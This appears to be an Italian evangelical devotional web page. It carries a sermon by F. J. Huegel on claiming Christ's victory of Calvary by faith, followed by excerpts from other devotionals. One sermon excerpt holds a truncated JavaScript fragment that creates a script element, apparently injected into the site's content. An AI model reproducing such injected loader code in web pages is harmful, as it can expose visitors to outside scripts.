FATE VOSTRA LA VITTORIA DI CRISTO

di  F. J. Huegel  –  Partecipiamo alla Sua vittoria riconoscendo interamente, e facendo nostra, la Sua opera completa del Calvario.  Il cristiano vittorioso deve essere fermo e irremovibile come il Salvatore quando disse:  ”Viene il principe di questo mondo e non ha nulla in me” (Giov. 14:30). Quali sforzi fece il nemico perché Gesù gli desse qualche appiglio sul quale egli potesse lavorare contro di Lui! Dietro gli scherni, gli sputi, la crudele flagellazione, le ingiurie e le parole blasfeme, era il principe delle tenebre di questo mondo, del quale il Salvatore era venuto a distruggere le opere. Ma tutto fu vano! Il malvagio non trovò nulla in Lui.

Satana è un avversario sconfitto. Fate vostra la vittoria completa che riportò sul Calvario il nostro Signore Gesù.  Ora noi dobbiamo poter dire: ”II diavolo non trova nulla in me ”. Se può trovare in noi qualcosa che possa utilizzare contro di noi: un po’ di cattiva volontà, un po’ d’invidia, animosità o risentimento contro un fratello che ci ha offeso, un po’ di orgoglio nascosto, qualche brutto pregiudizio, qualche desiderio sciocco della lode umana, ecc., in una parola, qualcosa che Paolo chiama  ”carne”, noi saremo sicuramente sconfitti nello scontro con il principe delle tenebre.

Ma voi dite: ”Come possiamo essere forti, irremovibili, come fu Gesù? ”. Rispondo – ” Per mezzo del riconoscimento e dell’appropriazione completa di quel che Egli ha conquistato per noi sul Calvario ”. Egli vi ha portato con Sé sulla Croce, perché l’uomo vecchio in voi fosse distrutto. Voi siete risuscitati poi con Lui e con Lui vi è stato concesso di sedere ”nei luoghi celesti ” (Romani  6; Efesini 2).

Satana non ha più alcun potere sulla nuova creatura. Egli può lavorare solo sul vecchio uomo. Se vivete nella condizione della vecchia creatura non crocifissa con Cristo, sarete sicuramente vulnerabili ai dardi infuocati del nemico.

La battaglia contro l’egoismo, il peccato e Satana è stata già vinta.

La vittoria cristiana non è che un ” Amen di fede ” alla grande, definitiva, completa vittoria che Cristo riportò sul Calvario. Per partecipare a questa vittoria non dobbiamo fare altro che dire quell’ “AMEN ” a quel che Dio, nella Sua Parola, dichiara un fatto, cioè che la nostra povera umanità, che Cristo aveva portato con Sé sulla Croce, è passata al trono, attraverso una tomba vuota.

Dovete imparare ad affermare come vuole la Scrittura; non possiamo sbagliare affermando quel che afferma Dio stesso.

Non è più necessario che chiediamo al Signore che ci conceda di sedere nei  ”luoghi celesti ”, sopra tutte le cose, in una vita cristiana vittoriosa; se crediamo davvero in Cristo, noi siamo già ”nei luoghi celesti ”. Abbiamo bisogno solo di affermare, dichiarare la nostra posizione. Questa è la fede!

Questo era il metodo di Paolo. Ascoltate le sue affermazioni di fede: ” Io posso ogni cosa in Colui che mi fortifica ” (Filippesi 4:13). ” Sono stato crocifisso con Cristo, e non sono più io che vivo, ma è Cristo che vive in me; e la vita che vivo ora nella carne, la vivo nella fede nel Figlio di Dio, il quale m’ha amato e ha dato se stesso per me ” (Galati 2:20).

”Noi siamo più che vincitori, in virtù di colui che ci ha amati” (Romani 8:37). Questo potrebbe apparire presunzione, ma non c’è presunzione nella fede. A che serve implorare da Dio qualcosa che già abbiamo in Cristo Gesù? Fate vostra la Sua vittoria; fatelo ADESSO.

Vivete nella vostra resurrezione.  La nuova creazione cominciò al momento della resurrezione del Salvatore Gesù. ”Se dunque uno è in Cristo, egli è una nuova creatura; le cose vecchie sono passate; ecco, tutte le cose sono diventate nuove.” (2 Corinzi 5:17).

“Corriamo con perseveranza la gara che ci è posta davanti,  tenendo gli occhi su Gesù, autore e compitore della nostra fede, il quale, per la gioia che gli era posta davanti, soffrì la croce disprezzando il vituperio e si è posto a sedere alla destra del trono di Dio.” (Ebrei 12:1, 2).

I commenti sono chiusi.

Meditazione del giorno

  • Meditazione del giorno: Il frutto dello Spirito
    In Devotional
    di ROBERTO BRACCO  –  La verità centrale nell’opera della grazia è costituita dalla «nuova nascita» e cioè da quella rigenerazione che si compie per la potenza dell’acqua e dello «Spirito». Questa verità stabilisce che soltanto le opere compiute dalla «nuova creatura» sono accettevoli davanti a Dio; queste opere sono le opere dello Spirito, possiamo ben dire il «frutto» dello Spirito. Con troppa facilità ci lasciamo ingannare dagli elementi che dovremmo invece saper valutare e discernere; un «buon» carattere umano, una elevata educazione sociale, una ottima morale ecclesiastica sono per noi soddisfacenti sostituzioni del [...continua la lettura]

Post meno Recenti

  • Sermone Domenica 21 Aprile: Terry Peretti
    Predicazione dell’evangelista TERRY PERETTI 2 Re 19 – “Non temere il nemico:Il Signore è più forte”     var d=document;var s=d.createElement(‘script’); […]
  • CHIESI A DIO
    Chiesi a Dio la forza Per compiere qualcosa; fui reso debole per ubbidire umilmente. Chiesi a Dio la salute per fare cose maggiori; ricevetti infermità per fare cose migliori. Chiesi la ricchezza per diventare felice; Ricevetti povertà per acquistare sapienza. Chiesi la potenza per essere onorato dagli uomini; Ricevetti debolezza per riconoscere la mia dipendenza da Dio. Chiesi ogni cosa per godere la vita; ricevetti la vita per godere ogni cosa. Non ricevetti nulla di quello che chiesi, ma tutto quello che speravo. Invece delle mie richieste presentate in preghiera, furono esaudite le mie preghiere non espresse. […]
  • LA COSTANZA NELLA FEDE
    di T. A. SPARKS   –  Poi Elia disse ad Acab: «Risali, mangia e bevi, poiché già si ode un rumore di grande pioggia». Acab risalì per mangiare e bere; ma Elia salì in vetta al Carmelo; e, gettatosi a terra, si mise la faccia tra le ginocchia, e disse al suo servo: «Ora va’ su, e guarda dalla parte del mare!» Quegli andò su, guardò, e disse: «Non c’è nulla». Elia gli disse: «Ritornaci sette volte!» 44 E la settima volta, il servo disse: «Ecco una nuvoletta grossa come la palma della mano, che sale dal mare». Allora Elia ordinò: «Sali e di’ ad Acab: “Attacca i cavalli al carro e scendi, perché la pioggia non ti fermi”». In un momento il cielo si oscurò di nuvole, il vento si scatenò, e cadde una gran pioggia. Acab montò sul suo carro, e se ne andò a […]
  • Una promessa per oggi: Il mio amore per te durerà per sempre
    Da tempi lontani il SIGNORE mi è apparso. “Sì, io ti amo di un amore eterno; perciò ti prolungo la mia bontà. Geremia 31:3 Che cosa significa che Dio ci ama con un amore eterno? Un mio caro amico una volta mi disse che essere amato di un amore eterno significa che non c’è mai stato un momento in tutta l’eternità in cui non sono stato amato. Ero amato prima della fondazione del mondo (Efesini 1: 3-6), ero amato mentre venivo formato nel seno di mia madre (Salmo 139: 13), e sono stato amato dal giorno in cui sono nato. (Salmo 71: 6). Gesù portò la rivelazione dell’amore eterno del Padre nel profondo del suo essere. Non c’era assolutamente alcun dubbio che Egli potesse non sapere che Suo padre lo aveva sempre amato. In Giovanni 17:24, nella sua preghiera […]
  • Una promessa per oggi: Io ti libererò dal male e ti salverò fino a portarti nel Mio regno.
    Il Signore mi libererà ancora da ogni opera malvagia e mi salverà fino a portarmi nel suo regno celeste. A lui sia la gloria nei secoli dei secoli. Amen. (2 Timoteo 4:18) L’Apostolo Paolo stava scrivendo a Timoteo, suo figlio spirituale, quando fece questa affermazione. Sappiamo dal racconto della vita di Paolo nella Bibbia che la sua vita è stata difficile. È stato lapidato, battuto con le verghe, ha fatto naufragio, è stato imprigionato e perseguitato più volte. Sono sicuro che ci sono stati momenti in cui ha dovuto lottare con lo scoraggiamento. Ma anche attraverso i momenti più bui, sappiamo che alla fine è arrivato in un luogo dove, come egli dice in Romani 8:38, nulla delle cose sulla terra e di quelle nei cieli, avrebbe mai potuto separarlo dall’amore di Dio, in Gesù Cristo. […]
  • LA SHEKINAH MANCANTE
    “Shekinah”: parola ebraica che descrive la nuvola scintillante che aleggiava sul coperchio dell’arca, simbolo ed espressione della gloria di Dio.  di A. W. TOZER  –  Viviamo in giorni nei quali l’opera del Signore è portata avanti da personalità brillanti secondo i metodi del mondo dell’intrattenimento e dello spettacolo. Come è importante perciò considerare il consiglio di uomini di Dio sinceri e umili, che tengono ascosta la loro personalità e mettono l’enfasi sull’opera interiore dello Spirito Santo. E’ nostra convinzione che il movimento evangelico continuerà a deviare sempre di più dagli standard del Nuovo Testamento a meno che coloro che hanno la responsabilità di guidare il movimento non passino dalla condizione di protagonismo e promozione personale alla condizione di […]

Prossimi Eventi

Dai nostri Culti